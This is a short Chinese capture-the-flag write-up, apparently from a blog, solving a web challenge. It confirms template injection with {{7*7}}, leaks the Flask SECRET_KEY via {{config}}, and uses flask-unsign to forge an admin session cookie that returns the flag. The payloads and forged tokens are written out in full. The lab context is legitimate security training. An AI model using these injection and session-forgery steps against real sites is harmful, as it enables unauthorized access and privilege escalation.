web8-考核

打开网页提示“Only the admin can get the flag,flag in /flag”“you name is None"

访问http://xmctf.top:8861/?name={{7}}，返回"you name is 7"

访问http://xmctf.top:8861/?name={{7*7}}，返回"you name is 49"

猜测可能为模板注入

访问http://xmctf.top:8861/?name={{config}}，得到了"'SECRET_KEY': 'woshicaiji'"

访问http://xmctf.top:8861/flag，提示refuse

尝试将自己身份更改为admin

获取session，为"eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.X9DgZg.AGJnfzJNE5BQk13dFTD_FTAzBFE"

用flask-unsign解码，密钥为"woshicaiji"，得到"{'username': b'guest'}"

用flask-unsign编码，明文为"{'username': b'admin'}"，密钥为"woshicaiji"，得到"eyJ1c2VybmFtZSI6eyIgYiI6IllXUnRhVzQ9In19.X9DkMQ.UjeS5ZjXn2-5flGTVfB3MCrLg8Y"

更改session重新访问，得到flag：

xmctf{f8e74d4b1b3fcd479f9b2a6a9ef935e0}

标签：http,name,8861,top,flag,考核,web8,xmctf
来源： https://www.cnblogs.com/hktk1643/p/14111495.html